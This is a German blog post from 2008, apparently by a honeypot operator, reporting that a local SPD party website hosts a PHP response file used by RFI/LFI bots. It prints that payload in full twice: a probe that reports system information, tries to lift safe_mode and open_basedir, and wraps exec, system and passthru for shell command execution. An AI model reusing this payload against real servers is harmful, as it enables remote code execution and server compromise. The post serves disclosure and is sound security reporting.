Webseite des SPD Ortsverbandes Esens-Nord gehackt

Sunday, October 12. 2008

Posted by katsumi in malware at 12:06 | Comments (2) | Trackbacks (0)

Webseite des SPD Ortsverbandes Esens-Nord gehackt

Damit mir nicht jemand vorwirft ich sei politisch,
veröffentliche ich hier einmal den Link zum responsefile,
das Teil eines Angriffes auf eine meiner domains war:
(...auch die SPD hilft beim Verteilen von RFI/LFI/SQLI bots)

http://spd-esens.de/spd/contentimage/bid.txt

Oder ist sowas nur interessant, wenn es beim jährlichen CCC Treffen passiert?

CODE:

<?php echo "549821347819481<br />"; //VaRiaBiLi Di SiSTeMa $uname = @php_uname(); //eCHo echo "uname -a: $uname<br />"; //SAFE OFF if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ $contrs=0; } else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ $contrs=0;} else{ $contrs=1; }} if($contrs == 0) { echo("uid="); } function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } exit; ?>

...mal sehen wielange es dauert bis die Datei entfernt wird.

UPDATE: ...noch nicht entfernt

CODE:

Thu Oct 16 19:48:23 CEST 2008 --19:48:23-- http://spd-esens.de/spd/contentimage/bid.txt => `bid.txt' Resolving spd-esens.de... 87.238.199.52 Connecting to spd-esens.de|87.238.199.52|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,360 (1.3K) [text/plain] 100%[==================================================================================================================>] 1,360 --.--K/s 19:48:24 (41.84 MB/s) - `bid.txt' saved [1360/1360]

UPDATE: 27. Oktober 7:40
...und immernoch da:

CODE:

Mon Oct 27 07:42:07 CET 2008 --07:42:07-- http://spd-esens.de/spd/contentimage/bid.txt => `bid.txt' Resolving spd-esens.de... 87.238.199.52 Connecting to spd-esens.de|87.238.199.52|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,360 (1.3K) [text/plain] 100%[==================================================================================================================>] 1,360 --.--K/s 07:42:07 (40.53 MB/s) - `bid.txt' saved [1360/1360] <?php echo "549821347819481<br />"; //VaRiaBiLi Di SiSTeMa $uname = @php_uname(); //eCHo echo "uname -a: $uname<br />"; //SAFE OFF if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ $contrs=0; } else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ $contrs=0;} else{ $contrs=1; }} if($contrs == 0) { echo("uid="); } function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } exit; ?>

...keine Idee, was der Ortsverband sich dabei denkt.

Trackbacks

Trackback specific URI for this entry

No Trackbacks

Comments

Display comments as (Linear | Threaded)

aha fdp spd und was kommt als nächstes ;D

#1 rabi on 2008-10-12 19:25 (Reply)

wat noch net gelöscht ? kat haste keinen netten blog eintrag hinterlassen :)

#2 rabi on 2008-10-16 20:46 (Reply)

Add Comment

Name
Email
Homepage
In reply to
Comment	To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly. Enter the string from the spam-prevention image above: BBCode format allowed
	Remember Information? Subscribe to this entry

Pages

katsumi's page
GROSPOLINA.ORG
RFI Liste

IRC.HONEYNET.CZ
Honeynet.cz IRC

ServerLost.at/the/net
nicht klicken, danke.
Administration

Quicksearch

Recently added

[wirres]Holz spal [...]
[malware]Webauftr [...]

Top Referrers

server19.xlhost.de (16741)
down.pyratz.com (190)
www.google.com (181)
www.server4you.org (166)
www.google.de (162)
www.intergenis.de (155)
blog.fdp.de (127)
www.hasicon.at (88)
88.198.38.89 (74)
honeyblog.org (62)
serverlost.de (51)
botnetz.com (45)
forums.oscommerce.de (39)
search.live.com (36)
www.netcraft.com (35)
klausnahr.wordpress.com (32)
uptime.netcraft.com (32)
pyratz.eu (31)
down.pyratz.org (25)
www.serverlost.com (24)
yourwebinterface.com (24)
www.google.co.kr (22)
www.pyratz.eu (20)
www.google.com.tr (16)
209.85.135.104 (15)
search.msn.com (13)
down.pyratz.de (12)
www.google.mu (12)
extremetracking.com (11)
www.altavista.com (10)
www.google.ch (10)
ming.tv (9)
www.google.co.id (9)
91.41.214.145 (8)
babelfish.altavista.com (7)
www.google.co.in (7)
www.google.com.eg (7)
www.google.it (7)